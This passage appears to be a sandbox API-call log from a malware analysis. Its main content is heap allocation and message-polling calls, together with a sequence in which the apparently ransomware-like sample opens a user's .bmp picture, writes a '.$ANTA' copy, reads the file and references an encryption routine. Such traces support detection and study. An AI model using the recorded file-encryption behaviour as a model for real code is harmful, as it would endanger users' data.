(HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0086.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0086.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0086.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0086.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0086.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0086.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0086.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0086.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0086.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0086.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0086.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0086.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0086.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0086.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0086.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0086.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9a40 [0086.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0086.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0086.818] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0086.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0086.818] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0086.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41abfc0 | out: hHeap=0x1780000) returned 1 [0086.818] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0086.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0086.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0086.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0086.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0086.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0086.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0086.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0086.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0086.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0086.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0086.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43ed3b0 [0086.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0086.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0086.819] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\5MOGH3JqsJ.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\5mogh3jqsj.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0086.819] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.819] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0086.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0086.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0086.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0086.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0086.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0086.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0086.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0086.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0086.819] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0086.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0086.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0086.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0086.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0086.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0086.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0086.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0086.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0086.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0086.820] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0086.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0086.820] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0086.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0086.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0086.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0086.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0086.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0086.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0086.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0086.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0086.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0086.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0086.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0086.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0086.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0086.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0086.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0086.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0086.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0086.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0086.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0086.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0086.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0086.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0086.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0086.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0086.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0086.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0086.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d58 [0086.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0086.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359ad0 [0086.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0086.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391930 [0086.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0086.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c08 [0086.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359ad0 | out: hHeap=0x1780000) returned 1 [0086.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0086.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0086.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0086.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d58 | out: hHeap=0x1780000) returned 1 [0086.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0086.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391930 | out: hHeap=0x1780000) returned 1 [0086.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0086.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0086.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0086.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0086.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0086.822] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0086.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0086.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0086.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c08 | out: hHeap=0x1780000) returned 1 [0086.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0086.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0086.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0086.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0086.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0086.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0086.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0086.822] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\5MOGH3JqsJ.bmp.$ANTA" (normalized: "c:\\users\\fd1hvy\\pictures\\5mogh3jqsj.bmp.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0086.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0086.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0086.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0086.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0086.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0086.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0086.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0086.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0086.823] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0086.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0086.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0086.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0086.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0086.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0086.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0086.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0086.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0086.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0086.823] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0086.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0086.823] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0086.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0086.823] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0086.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0086.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0086.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0086.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0086.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0086.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0086.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0086.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0086.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0086.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0086.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0086.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0086.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0086.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0086.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0086.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0b020 [0086.827] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0086.827] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ef28*=0x8c24, lpOverlapped=0x0) returned 1 [0086.828] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0086.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0086.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0086.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0086.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0086.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8c24) returned 0x4516010 [0086.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0b020 | out: hHeap=0x1780000) returned 1 [0086.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0086.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0086.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0086.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0086.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0086.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8c24) returned 0x451ec40 [0086.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0086.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0086.831] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0086.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0086.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0086.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0086.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0086.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0086.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8c24) returned 0x4516010 [0086.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0086.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0086.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0086.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0086.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0086.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0086.832] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0086.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0086.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0086.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0086.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0086.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0086.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0086.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0086.832] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0086.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0086.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0086.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f88 [0086.832] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0086.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f88 | out: hHeap=0x1780000) returned 1 [0086.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0086.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0086.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24f0 [0086.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0086.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0086.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0086.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0086.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8c24) returned 0x4516010 [0086.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0086.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2520 [0086.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0086.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0086.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0086.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2350 [0086.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0086.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0086.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0086.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2380 [0086.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0086.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0086.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0086.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca190 [0086.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0086.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0086.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0086.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0086.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0086.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8c24) returned 0x4527870 [0086.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0086.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0086.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0086.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0086.834] RtlAllocateHeap 